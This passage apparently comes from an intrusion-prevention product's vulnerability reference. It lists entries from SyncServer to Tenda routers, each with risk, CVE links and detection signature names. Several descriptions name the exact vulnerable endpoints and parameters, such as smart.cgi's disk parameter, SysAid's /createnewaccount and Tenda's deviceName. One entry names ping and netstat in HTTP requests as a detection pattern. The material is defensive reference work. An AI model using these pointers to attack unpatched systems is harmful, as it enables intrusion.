Description: A vulnerability in Microchip SyncServer timekeeping modules which allows remote attackers to execute arbitrary code, due to insufficient input validation.
Situation: HTTP_CRL-Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution
References:
CVE-2022-40022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40022
Back to top

Syncovery-For-Linux-Web-GUI-Authenticated-RCE

About this vulnerability: A vulnerability in Syncovery File Sync & Backup Software for Linux.
Risk: High
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Linux
Software: Syncovery
Type: Insecure Configuration
Description: A vulnerability in Syncovery File Sync & Backup Software for Linux, versions before v9.48j, which allows remote attackers to execute arbitrary code on the target server by authenticating with a default password, giving the attcker the ability to create jobs which are executed before/after a profile is run, executed as root.
Situation: HTTP_CRL-Syncovery-For-Linux-Web-GUI-Authenticated-RCE
References:
CVE-2022-36534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36534
Back to top

Synergy-Clipboard-Integer-Overflow

About this vulnerability: etected an attempt to exploit an integer overflow vulnerability in Synergy screen sharing application
Risk: High
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Synergy
Type: Integer Overflow
Description: A vulnerability exists in the clipboard functionality of Synergy screen sharing application. Presenting a large integer for the "format" field of DCLP request (set clipboard), it is possible to override a pointer in application memory. This vulnerability can be used for Denial of Service or potential remote code execution.
Situation: Generic_CS-Synergy-Clipboard-Integer-Overflow
Back to top

Synology-DiskStation-Manager-Command-Execution

About this vulnerability: A Synology DiskStation Manager Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Synology
Type: Remote Control
Description: A vulnerability in Synology DiskStation Manager, versions 4.0 before 4.0-2259, 4.2 before 4.2-3243, and 4.3 before 4.3-3810 Update 1, which allows remote attackers to append data to arbitrary files and execute arbitrary code via a pathname in the SLICEUPLOAD X-TMP-FILE HTTP header.
Situation: HTTP_CS-Synology-DiskStation-Manager-Command-Execution
References:
CVE-2013-6955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6955
OSVDB-101247
http://www.osvdb.org/101247
Back to top

Synology-DiskStation-Manager-smart.cgi-RCE

About this vulnerability: An attempt to exploit a vulnerability in Synology Appliance
Risk: High
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: Synology
Type: Input Validation
Description: There exists a vulberability in Synology, versions before 5.2-5967-5, which allows remote attacker to execute arbitrary system commands in webman/modules/StorageManager/smart.cgi due to the insufficient user input validation to the disk parameter.
Situation: HTTP_CRL-Synology-DiskStation-Manager-smart.cgi-RCE
References:
CVE-2017-15889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15889
Back to top

Synology-Safeaccess-SQL-Injection

About this vulnerability: A vulnerability in Synology SafeAccess
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: Synology
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Synology SafeAccess. An unauthenticated attacker can use this vulnerability to execute arbitrary SQL commands via a maliciously crafted domain parameter value.
Situation: HTTP_CRL-Synology-Safeaccess-SQL-Injection
References:
CVE-2020-27660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27660
Back to top

SysAid-Help-Desk-Administrator-Account-Creation

About this vulnerability: A SysAid Help Desk Administrator Account Creation vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SysAid
Type: Insecure Configuration
Description: A vulnerability in SysAid, versions before 15.2, which allows remote attackers to create Administrator accounts via /createnewaccount and write to arbitrary files via the fileName parameter to /userentry.
Situation: HTTP_CSU-SysAid-Help-Desk-Administrator-Account-Creation
References:
CVE-2015-2993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2993
Back to top

SysAid-Help-Desk-Administrator-Portal-File-Upload

About this vulnerability: SysAid Help Desk Administrator Portal File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SysAid
Type: Directory Traversal
Description: A directory traversal and file upload vulnerability exists in SysAid, before 15.2, that allows remote attackers to execute arbitrary code by allowing the upload and execution of .jsp files.
Situation: HTTP_CS-SysAid-Help-Desk-Administrator-Portal-File-Upload
References:
CVE-2015-2994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2994
Back to top

SysAid-Help-Desk-File-Disclosure

About this vulnerability: A SysAid Help Desk File Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SysAid
Type: Directory Traversal
Description: A vulnerability in SysAid, versions before 15.2, which allows remote attackers to read, and download, arbitrary files, or cause a denial of service condition by the use of a directory traversal. This also covers CVE-2015-2997 and CVE-2015-2998.
Situation: HTTP_CSU-SysAid-Help-Desk-File-Disclosure
References:
CVE-2015-2996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2996
Back to top

SysAid-On-Premise-Directory-Traversal-CVE-2023-47246

About this vulnerability: A vulnerability in SysAid On-Premise
Risk: Moderate
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Platform: Generic
Software: SysAid
Type: Input Validation
Description: Improper validation of paths causes a directory traversal vulnerability in SysAid, which can be exploited to execute code on the target system.
Situation: HTTP_CSU-SysAid-On-Premise-Directory-Traversal-CVE-2023-47246
References:
CVE-2023-47246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47246
Back to top

SysAid-Rdslogs-Arbitrary-File-Upload

About this vulnerability: A SysAid Rdslogs Arbitrary File Upload vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: SysAid
Type: Malfunction
Description: A vulnerability in SysAid, versions before 15.2, which allows remote attackers to upload and execute arbitrary files by adding a NULL byte after the file extension.
Situation: HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence
References:
CVE-2015-2995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2995
Back to top

Sysax-Multi-Server-Stack-Based-Buffer-Overflow

About this vulnerability: A Sysax Multi Server Stack Based Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sysax
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Sysax Multi Server, versions before 5.52, which allows remote attackers to execute arbitrary code via a crafted request.
Situation: HTTP_CRL-Sysax-Multi-Server-Stack-Based-Buffer-Overflow
References:
CVE-2012-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6530
BID-51548
http://www.securityfocus.com/bid/51548
OSVDB-82329
http://www.osvdb.org/82329
Back to top

SysGauge-SMTP-Validation-Buffer-Overflow

About this vulnerability: A SysGauge SMTP Validation Buffer Overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SysGauge
Type: Buffer Overflow
Description: A buffer overflow vulnerability in SysGauge, version 1.5.18, which allows remote attackers to execute arbitrary code via a malicious response in the 220 service ready response.
Situation: SMTP_SS-SysGauge-SMTP-Validation-Buffer-Overflow
Back to top

Syssfic-Trojan-Infection-Traffic

About this vulnerability: Syssfic trojan infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Syssfic trojan infection traffic was detected.
Situation: HTTP_CSU-Syssfic-Trojan-Infection-Traffic
Back to top

System-Command-Usage

About this vulnerability: System command usage detected
Risk: High
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Any Software
Type: Malfunction
Description: Usage of a system command, such as "ping" or "netstat", has been detected in a HTTP request. This may be an attempt to execute commands on the server and retrieve information that is not intented to be accessible.
Situation: HTTP_CRL-Possible-Netstat-Command-Usage
HTTP_CRL-Possible-Ping-Command-Usage
HTTP_CSH-Possible-Netstat-Command-Usage-In-Referer-Header
HTTP_CSH-Possible-Ping-Command-Usage-In-Referer-Header
Back to top

Systemd-Resolved-DNS_Packet_New-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Systemd Systemd
Risk: High
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Systemd
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in systemd-resolved. A malicious DNS server may use this to execute arbitrary code on the target client.
Situation: DNS-TCP_Systemd-Resolved-DNS_Packet_New-Heap-Buffer-Overflow
References:
CVE-2017-9445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9445
Back to top

Systemd-Resolved-DNS_Packet_Read_Type_Window-Infinite-Loop

About this vulnerability: A vulnerability in Systemd Systemd
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Systemd
Type: Infinite Loop
Description: Improper parsing of DNS NSEC records in the dns_packet_read_type_window function of systemd-resolved causes an infinite loop, which can be exploited to cause a denial of service condition on the target system.
Situation: DNS-UDP_Systemd-Resolved-DNS_Packet_Read_Type_Window-Infinite-Loop
References:
CVE-2017-15908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15908
Back to top

SysV-Login-BOF

About this vulnerability: Buffer overflow in login in SysV derived systems
Risk: High
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: HP-UX 10; HP-UX 11; AIX 4; AIX 5; SCO; IRIX 3; Solaris; Solaris 7; Solaris 8
Software: Generic telnet server
Type: Buffer Overflow
Description: System V (SYSV) derived systems are vulnerable to a static buffer overflow. The implementation of login (known as "/bin/login" for its location in the file system) for such SYSV-derived systems allows remote attackers to execute arbitrary commands on a target system with superuser privileges via a large number of arguments throught services such as telnet and rlogin.
Situation: Telnet_SysV-Login-BOF-1
Telnet_SysV-Login-BOF-2
Telnet_SysV-Login-BOF-3
RLOGIN_System-V-Login-Buffer-Overflow
References:
CVE-2001-0797
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0797
BID-3681
http://www.securityfocus.com/bid/3681
OSVDB-690
http://www.osvdb.org/690
OSVDB-691
http://www.osvdb.org/691
Back to top

TA551-Shathak-Malware-Infection-Traffic

About this vulnerability: TA551 Shathak malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: TA551 Shathak malware infection traffic was detected.
Situation: HTTP_CRL-TA551-Shathak-Malware-Infection-Traffic
Back to top

TA551-Shathak-Malware-Infection-Traffic_2

About this vulnerability: TA551 Shathak malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: TA551 Shathak malware infection traffic was detected.
Situation: HTTP_SHS-TA551-Malware-Infection-Traffic_2
Back to top

TallSoft-Quick-TFTP-Server-Pro-2.1-Buffer-Overflow

About this vulnerability: TallSoft Quick TFTP Server Pro 2.1 Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: TallSoft Quick TFTP Server
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in TallSoft Quick TFTP Server Pro 2.1, which allows attackers to remotly execute arbitrary code or cause a denial of service via a long mode field in a read or write request.
Situation: TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow
References:
CVE-2008-1610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1610
BID-28459
http://www.securityfocus.com/bid/28459
OSVDB-43784
http://www.osvdb.org/43784
Back to top

Tandberg-Video-Server-Directory-Traversal

About this vulnerability: Directory Traversal Vulnerability allows unauthrized access
Risk: High
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Tandberg Video Communication Server
Type: Directory Traversal
Description: Multiple directory traversal vulnerabilities in the web administration interface on the TANDBERG Video Communication Server (VCS) before X5.1 allow remote authenticated users to read arbitrary files.
Situation: HTTP_CSU-Tandberg-Directory-Traversal-File-Disclosure
References:
CVE-2009-4511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4511
Back to top

Tarantool-Xrow_Header_Decode-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Tarantool Tarantool
Risk: Moderate
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Tarantool
Type: Malfunction
Description: An out of bounds read vulnerability in the xrow_header_decode function of Tarantool can be used to trigger a denial of service condition.
Situation: Generic_CS-Tarantool-Xrow_Header_Decode-Out-Of-Bounds-Read
References:
CVE-2016-9037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9037
Back to top

TBK-DVR4104-And-DVR4216-Authentication-Bypass-CVE-2018-9995

About this vulnerability: A vulnerability in TBK DVR4104 and DVR4216
Risk: High
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Generic
Software: TBK DVR
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in TBK DVR4104 and DVR4216 digital video recording devices. Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login run rebranded versions of the vulnerable software and are also vulnerable.
Situation: HTTP_CSH-TBK-DVR4104-And-DVR4216-Authentication-Bypass-CVE-2018-9995
References:
CVE-2018-9995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995
Back to top

TCP-Microsoft-Message-Queuing-BOF

About this vulnerability: Buffer overflow vulnerability in Microsoft Message Queuing
Risk: High
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Message Queuing
Type: Buffer Overflow
Description: Buffer overflow vulnerability exists in the Microsoft Message Queuing component on Windows 2000 and Windows XP SP1. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim's machine.
Situation: MSRPC-TCP_CPS-Microsoft-Message-Queuing-Buffer-Overflow
References:
CVE-2005-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0059
BID-13112
http://www.securityfocus.com/bid/13112
OSVDB-15458
http://www.osvdb.org/15458
MS05-017
http://technet.microsoft.com/security/bulletin/MS05-017
Back to top

TCP-MySQL-MaxDB-WebDBM-BOF

About this vulnerability: Buffer overflow vulnerability in MySQL MaxDB WebDBM service
Risk: High
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MySQL
Type: Buffer Overflow
Description: Buffer overflow vulnerability exists in the MySQL MaxDB WebDBM service. Remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim's machine.
Situation: HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-3
HTTP_CSU-MySQL-MaxDB-WebDBM-BOF-2
HTTP_CSU-MySQL-MaxDB-WebDBM-BOF
Generic_MySQL-MaxDB-WebDBM-BOF
References:
CVE-2005-0684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0684
BID-13368
http://www.securityfocus.com/bid/13368
OSVDB-15816
http://www.osvdb.org/15816
Back to top

TCP-SCO-Unix-Calserver-Buffer-Overflow

About this vulnerability: Buffer-overflow vulnerability in SCO UNIX calserver
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: SCO Internet FastStart, SCO Open Server
Type: Buffer Overflow
Description: SCO Unix calserver has a buffer-overflow vulnerability in the handling of long messages. A remote attacker can exploit this vulnerability to gain root access.
Situation: Generic_CS-SCO-Unix-Calserver-Buffer-Overflow
References:
CVE-2000-0306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0306
BID-2353
http://www.securityfocus.com/bid/2353
Back to top

Tcpdump-ISAKMP-Payload-Handling-DOS

About this vulnerability: A vulnerability in Network Research Group TCPdump
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Tcpdump
Type: Malfunction
Description: Two vulnerabilities exist in the Tcpdump ISAKMP payload handling module, which can be exploited to cause a DoS (Denial of Service) by sending packets with specially crafted payloads. Exploiting either vulnerability will result in Tcpdump reading past a buffer allocating in the heap, resulting in a memory access error, or segmentation fault. Exploiting either vulnerability will result in the termination of Tcpdump.
Situation: Generic_UDP-Tcpdump-ISAKMP-Payload-Handling-DOS
References:
CVE-2004-0183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0183
BID-10003
http://www.securityfocus.com/bid/10003
Back to top

TCP_Linux-Kernel-Firewall-Logging-Denial-Of-Service

About this vulnerability: A vulnerability in Linux Kernel allows remote attacked to crahs the kernel via malformed TCP packet
Risk: Moderate
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: A vulnerability exists in the way the Linux kernel 2.6 firewall logs TCP packets. The vulnerability results from improper validation of the TCP header when a TCP segment matches a firewall rule. This vulnerability can allow a remote attacker to cause complete kernel failure on the target system by sending a specially crafted, and possibly spoofed, TCP packet.
Situation: TCP_Header-Length-Error
References:
CVE-2004-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0816
BID-11488
http://www.securityfocus.com/bid/11488
Back to top

Tdss.c-Trojan

About this vulnerability: TDSS.C trojan
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Tdss.c is a Windows trojan.
Situation: HTTP_CSH-Tdss.c-Trojan-Traffic
Back to top

TeamViewer-Unquoted-URI-Handler-SMB-Redirect

About this vulnerability: A vulnerability in TeamViewer.
Risk: High
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Platform: Generic
Software: TeamViewer
Type: Input Validation
Description: A vulnerability in TeamViewer, versions before 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3, which allows remote attackers to force the victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking, due to not properly quoting custom URI handlers.
Situation: File-Text_TeamViewer-Unquoted-URI-Handler-SMB-Redirect
References:
CVE-2020-13699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699
Back to top

TeamViewer-Usage

About this vulnerability: TeamViewer usage
Risk: Low
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TeamViewer
Type: Remote Control
Description: TeamViewer is a service that is able to share desktop connections, files, and private networks across machines, even if they are located behind firewalls. Use of this kind of applications may be considered a security risk in controlled environments.
Situation: Generic_CS-TeamViewer-Client-Startup
HTTP_CSH-TeamViewer-DynGate-Request
Back to top

Technote-Main.cgi-File-Directory-Traversal

About this vulnerability: Technote main.cgi file directory traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Technote
Type: Directory Traversal
Description: A directory traversal vulnerability in main.cgi allows an attacker to read arbitrary files.
References:
CVE-2001-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0075
BID-2156
http://www.securityfocus.com/bid/2156
Back to top

Technote-Print.cgi-Directory-Traversal

About this vulnerability: Technote print.cgi directory traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Technote
Type: Directory Traversal
Description: A directory traversal vulnerability in print.cgi allows an attacker to read arbitrary files.
References:
CVE-2001-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0075
BID-2156
http://www.securityfocus.com/bid/2156
Back to top

Tedroo-Bot

About this vulnerability: Tedroo Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1338-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Tedroo is a Botnet used for sending spam e-mail.
Back to top

Telerik-UI-File-Upload-CVE-2017-11317

About this vulnerability: A vulnerability in Telerik UI
Risk: Moderate
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1368-5242
Platform: Windows
Software: Telerik UI
Type: Malfunction
Description: An attempt to exploit a vulnerability in Telerik UI
Situation: HTTP_CSU-Telerik-UI-File-Upload-CVE-2017-11317
References:
CVE-2017-11317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317
Back to top

Telerik-UI-For-ASP.NET-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Telerik UI For ASP.NET detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: Telerik UI
Type: Malfunction
Description: An attempt to exploit a vulnerability in Telerik UI For ASP.NET detected.
Situation: HTTP_CSU-Telerik-UI-For-ASP.NET-Remote-Code-Execution
References:
CVE-2017-9248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9248
Back to top

Telerik-UI-Insecure-Deserialization-CVE-2019-18935

About this vulnerability: A vulnerability in Telerik UI
Risk: Moderate
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Telerik UI
Type: Malfunction
Description: An attempt to exploit a vulnerability in Telerik UI
Situation: File-Text_Telerik-UI-Insecure-Deserialization-CVE-2019-18935
References:
CVE-2019-18935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18935
Back to top

Telesquare-Router-Command-Injection-Vulnerability-CVE-2021-46422

About this vulnerability: An attempt to exploit a vulnerability in Telesquare Router detected
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Telesquare Router
Type: Input Validation
Description: Telesquare SDT-CW3B1 router 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Situation: HTTP_CSU-Telesquare-Router-Command-Injection-Vulnerability-CVE-2021-46422
References:
CVE-2021-46422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
Back to top

Telnet-Cisco-Telnetd-Failed-Login

About this vulnerability: Failed login attempt against a Cisco telnet daemon
Risk: Low
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-1296-5242
Platform: Cisco IOS
Software: Cisco telnetd
Type: Failed Login
Description: Failed Telnet login attempt against a Cisco telnet daemon. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation: Telnet_STS-Cisco-Failed-Login
Back to top

Telnet-Client-Env-Opt-Add-Function-BOF

About this vulnerability: Buffer overflow in various BSD-based Telnet clients
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic telnet client
Type: Buffer Overflow
Description: Various vendors' BSD-based Telnet clients contain a buffer overflow in the env_opt_add() function. A remote attacker could send a malicious server reply to overflow a buffer and to execute arbitrary code in the context of the user that is using the vulnerable client software.
Situation: Telnet_SCS-Telnet-Client-Env-Opt-Add-Function-BOF
References:
CVE-2005-0468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0468
BID-12919
http://www.securityfocus.com/bid/12919
OSVDB-15093
http://www.osvdb.org/15093
Back to top

Telnet-Client-Slc-Add-Reply-Function-BOF

About this vulnerability: Buffer overflow vulnerability in various BSD-based Telnet clients
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic telnet client
Type: Buffer Overflow
Description: Various vendors' BSD-based Telnet clients contain a buffer overflow in the slc_add_reply() function LINEMODE suboptions handling. A remote attacker could send a malicious server reply with a large number of Set Local Character (SLC) commands to overflow a buffer and to execute arbitrary code in the context of the user that is using the vulnerable client software.
Situation: Telnet_SCS-Telnet-Client-Slc-Add-Reply-Function-BOF
References:
CVE-2005-0469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0469
BID-12918
http://www.securityfocus.com/bid/12918
OSVDB-15094
http://www.osvdb.org/15094
Back to top

Telnet-Failed-Login

About this vulnerability: Failed Telnet login
Risk: Low
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic telnet server
Type: Failed Login
Description: Failed Telnet login attempt. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation: Telnet_STS-Failed-Login
Back to top

Telnet-Kerberos-Login-Authentication-Bypass

About this vulnerability: Kerberos bug allows unauthorized Login
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic telnet server
Type: Malfunction
Description: Vulnerable telnet daemons allow remote client to bypass authentication and gain system access via specially crafted login name.
Situation: Telnet_CCS-Kerberos-Authentication-Bypass
References:
CVE-2007-0956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0956
BID-23281
http://www.securityfocus.com/bid/23281
Back to top

Telnet-Linkerbug

About this vulnerability: Telnetd allows changing of LD_LIBRARY_PATH remotely
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic telnet server
Type: Malfunction
Description: Vulnerable telnet daemons allow remote client to specify its environment variables. LD_LIBRARY_PATH is such variable. Changing LD_LIBRARY_PATH could lead to client specified arbitrary code execution using root priviledges in the telnetd server.
Situation: Telnet_CCS-Ld-Library-Path-Attack
References:
CVE-1999-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0073
Back to top

Telnet-Microsoft-Telnet-Client-Information-Disclosure

About this vulnerability: Information disclosure vulnerability in the Telnet client for Microsoft Windows
Risk: Low
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003
Software: Microsoft Services for UNIX
Type: Malfunction
Description: There is an information disclosure vulnerability in the Telnet client for Microsoft Windows. By persuading a target user to connect to a malicious server with the vulnerable telnet client, a remote attacker can obtain the environment variables of the user. The persuasion can be done by constructing a web page containing an URL starting with the protocol spesification 'telnet://'.
Situation: Telnet_SCS-Microsoft-Telnet-Client-Information-Disclosure
References:
CVE-2005-1205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205
BID-13940
http://www.securityfocus.com/bid/13940
OSVDB-17303
http://www.osvdb.org/17303
MS05-033
http://technet.microsoft.com/security/bulletin/MS05-033
Back to top

Telnet-Resolv-Host-Conf-Manipulation

About this vulnerability: Unauthorized file access
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic telnet server
Type: Malfunction
Description: By manipulating RESOLV_HOST_CONF environment variable, a logged in user can have unauthorized access to system files.
Situation: Telnet_CCS-Resolv-Host-Conf-Disclosure
References:
CVE-2001-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0170
BID-2181
http://www.securityfocus.com/bid/2181
Back to top

Telnet-Usage

About this vulnerability: Telnet usage detection.
Risk: Low
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic telnet server
Type: Remote Control
Description: This vulnerability is referenced by fingerprints that detect Telnet protocol usage. Telnet transfers all data between the client and the server in cleartext making it possible for third parties to listen for sensitive data such as passwords.
Situation: Telnet_Telnet-Usage
Back to top

Teltonika-RUT9XX-Router-OS-Command-Injection-CVE-2018-17532

About this vulnerability: A vulnerability in Teltonika RUT9XX routers
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: Teltonika RUT9XX
Type: Input Validation
Description: An OS command injection vulnerability has been reported in Teltonika RUT9XX routers with firmware versions before 00.04.233. An unauthenticated attacker can use this vulnerability to execute arbitrary commands by sending a crafted HTTP request to autologin.cgi or hotspotlogin.cgi.
Situation: HTTP_CRL-Teltonika-RUT9XX-Router-OS-Command-Injection-CVE-2018-17532
References:
CVE-2018-17532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17532
Back to top

Tenda-AC11-Remote-Code-Execution-CVE-2021-31755

About this vulnerability: An attempt to exploit a vulnerability in Tenda AC11 detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Tenda
Type: Buffer Overflow
Description: A stack buffer overflow has been reported in Tenda AC11 routers. A remote, unauthenticated attacker can exploit the vulnerability by sending a crafted POST request. Successful exploitation of this vulnerability could allow arbitrary code execution.
Situation: HTTP_CRL-Tenda-AC11-Remote-Code-Execution-CVE-2021-31755
References:
CVE-2021-31755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31755
Back to top

Tenda-AC15-AC1900-Remote-Code-Execution-CVE-2020-10987

About this vulnerability: A vulnerability in Tenda AC15 AC1900 routers
Risk: High
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Generic
Software: Tenda
Type: Input Validation
Description: There exists a remote code execution vulnerability in Tenda AC15 AC1900 routers. A successful exploitation of this vulnerability could lead in arbitrary command execution via the deviceName parameter.
Situation: HTTP_CRL-Tenda-AC15-AC1900-Remote-Code-Execution-CVE-2020-10987
References:
CVE-2020-10987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10987
Back to top
